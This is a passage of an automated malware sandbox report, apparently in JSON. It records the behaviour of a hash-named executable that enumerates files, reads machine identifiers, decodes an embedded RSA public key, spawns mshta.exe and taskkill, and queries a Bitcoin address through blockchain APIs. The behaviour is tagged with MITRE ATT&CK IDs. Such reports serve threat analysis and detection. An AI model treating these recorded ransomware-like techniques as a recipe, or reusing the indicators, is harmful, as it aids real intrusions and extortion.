\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000030b22a0020b81200b344ce6b81d0ea76000000000000000000000000000000000000000000000000880200000000000000000000000000007ef4119980450699dcbc12005ecbe8768802000000000000005de67638bf12000e5de676d0ba1200dcaaea76010000000000000072000000ffffffffffffffff58b8120078020000000000002500000058b812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007dfb1199b0b812006d823376841b2a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff1a00de00e2004200620be87600000000187022000000000050000000c4202a0002000000700f260000000000010000083042290040742200380be876e4b612000200000098b712003f08f77502000000700f2600000000000100001888fbf67588b71200c81cea765eb9120095fbf675bcb81200700f260000000000000000000000000044b81200000022007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360009f4119904b812006d823376841b2a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360011f311991cb112006d823376dc1e2c0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000d0d4280070ad1200b344ce6b81d0ea7600000000000000000000000000000000000000000000000088020000000000000000000000000000ceee1199505f06992cb212005ecbe8768802000000000000005de67688b412000e5de67620b01200dcaaea7601000000000000007a000000ffffffffffffffffa8ad1200780200000000000025000000a8ad12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000dee119900ae12006d82337604922a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00d0030000000022000000001048232d0064ad12000464aa7738012200e063aa7702000000700f2600000000000100000828ac120000000001bcc7b277c0c7b2770a000000e8ac12003f08f77502000000700f2600000000000100001888fbf675d8ac1200c81cea76aeae120095fbf6750cae1200700f260000000000000000000000000094ad1200000022007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d9ee119954ad12006d82337604922a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00f4a11200b344ce6b05000000000000000000000000000000000000000000000000000000a40200000000000000000000000000000ca91200d0530699b0a61200b0a612005ecbe876a402000000000000005de6760ca912000e5de676a4a41200dcaaea76010000000000000072000000ffffffffffffffff2ca212007802000000000000250000002ca212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360089e1119984a212006d8233769cd3290004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff19000a01fb004200620be87600000000187022000000000050000000c4202a0002000000700f260000000000010000089043290040742200380be876b8a01200020000006ca112003f08f77502000000700f2600000000000100001888fbf6755ca11200c81cea7632a3120095fbf67590a21200700f260000000000000000000000000018a21200000022007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360055e21199d8a112006d8233769cd3290004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003dd91199f09a12006d8233761cd6290004010000 (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"IsWow64Process\" with parameter \"3064\" - (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LookupAccountSidW\" with param Name SYSTEM (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LookupAccountSidW\" with param Name NETWORK SERVICE (UID: 00000000-00003064)\n \"mshta.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetWindowTextW\" with parameter \"MMDEVAPI Device Window\" - (UID: 00000000-00003064)\n \"mshta.exe\" called \"GetWindowTextW\" (UID: 00000000-00003044)\n \"taskkill.exe\" called \"GetWindowTextW\" (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetWindowTextW\" with parameter \"Administrator: %WINDIR%\\system32\\cmd.exe - taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.ex\" - (UID: 00000000-00002988), \"taskkill.exe\" called \"GetWindowTextW\" with parameter \"GDI+ Window\" - (UID: 00000000-00002988), \"taskkill.exe\" called \"GetWindowTextW\" with parameter \"MCI command handling window\" - (UID: 00000000-00002988), \"taskkill.exe\" called \"GetWindowTextW\" with parameter \"VM3DService Hidden window\" - (UID: 00000000-00002988), \"taskkill.exe\" called \"GetWindowTextW\" with parameter \"DWM Notification Window\" - (UID: 00000000-00002988), \"taskkill.exe\" called \"GetWindowTextW\" with parameter \"OleMainThreadWndName\" - (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MSHTA.EXE\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MSHTA.EXE\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\6053E42962B2BCDC4EBB1865C92BE864452723FD9782E6DB98D7F894F7BFE189.EXE\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\6053E42962B2BCDC4EBB1865C92BE864452723FD9782E6DB98D7F894F7BFE189.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"mshta.exe\" queries volume information of \"C:\\Windows\\Fonts\\l_10646.ttf\" at 00000000-00003044-0000010C-15719845\n \"mshta.exe\" queries volume information of \"C:\\Windows\\Fonts\\l_10646.ttf\" at 00000000-00003044-0000010C-15780099\n \"mshta.exe\" queries volume information of \"C:\\Windows\\Fonts\\arial.ttf\" at 00000000-00003044-0000010C-15792566\n \"mshta.exe\" queries volume information of \"C:\\Windows\\Fonts\\times.ttf\" at 00000000-00003044-0000010C-15805916\n \"mshta.exe\" queries volume information of \"C:\\Windows\\Fonts\\msmincho.ttc\" at 00000000-00003044-0000010C-15821376\n \"mshta.exe\" queries volume information of \"C:\\Windows\\Fonts\\msmincho.ttc\" at 00000000-00003044-0000010C-15931015", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"taskkill.exe\" called \"EnumWindows\" with parameter \"850268\" - (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"mshta.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindFirstFileW\" with parameter %APPDATA%\\Microsoft\\Windows\\Recent\\*.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Appearance and Personalization.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Database1.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter desktop.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Display.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Downloads.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Hardware and Sound.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Network and Internet.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Programs.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter pythonLibrary.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter slowfuzzer.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter System and Security.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter VxFuzzer.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Win7-KB3191566-x86.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Win7-KB3191566-x86.msu.lnk (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindFirstFileW\" with parameter c:\\* (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter 6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2063666300\"\n \"cx\": \"1280\"\n \"cy\": \"1024\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"201394252\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"184617041\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2432764775\"\n \"cx\": \"1280\"\n \"cy\": \"1024\"}\n \"mshta.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2432764775\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"mshta.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2063666300\"\n \"cx\": \"960\"\n \"cy\": \"30\"}\n \"mshta.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2432764775\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"mshta.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"352389401\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"mshta.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2063666300\"\n \"cx\": \"132\"\n \"cy\": \"30\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"mshta.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003064)\n \"mshta.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003044)\n \"taskkill.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-348", "type": 9, "relevance": 1, "name": "Checks internet connectivity using tracert/ping", "description": "Process \"PING.EXE\" with commandline \"ping -n 1 <IPv4>\" (UID: 00000000-00002080)", "origin": "Monitored Target", "attck_id": "T1016.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"chain.so\" (90 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"mshta.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (UID: 00000000-00003044)\n \"mshta.exe\" called \"InternetOpenW with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-118", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the URL data", "description": "\"mshta.exe\" called \"InternetReadFile\" with parameter 72 (UID: 00000000-00003044)\n \"mshta.exe\" called \"InternetReadFile\" with parameter 595 (UID: 00000000-00003044)\n \"mshta.exe\" called \"InternetReadFile\" with parameter 345 (UID: 00000000-00003044)\n \"mshta.exe\" called \"InternetReadFile\" with parameter 5349 (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-143", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a new HTTP request", "description": "\"mshta.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294\" - (UID: 00000000-00003044), \"mshta.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738936917574\" - (UID: 00000000-00003044)\n \"mshta.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /api/address/transactions/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt/0/sent/all?_=1738937580114\" - (UID: 00000000-00003044), \"mshta.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /api/v2/get_tx_spent/btc/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738940040587\" - (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294\"\n Found http requests in header \"GET /r/gsr1.crl\"\n Found http requests in header \"GET /r/r4.crl\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-78", "type": 7, "relevance": 1, "name": "HTTP requests contain custom Base62 strings", "description": "Contains base62 string in header \"17gd1msp5FnMcEMF1MitTNSsYs7w7AQyC\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "api-229", "type": 6, "relevance": 3, "name": "Calls an API typically used to convert data from string to binary", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJB\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"UUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1Q\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"N0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRh\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"MDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdr\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"UE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRG\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"WVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1F\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" 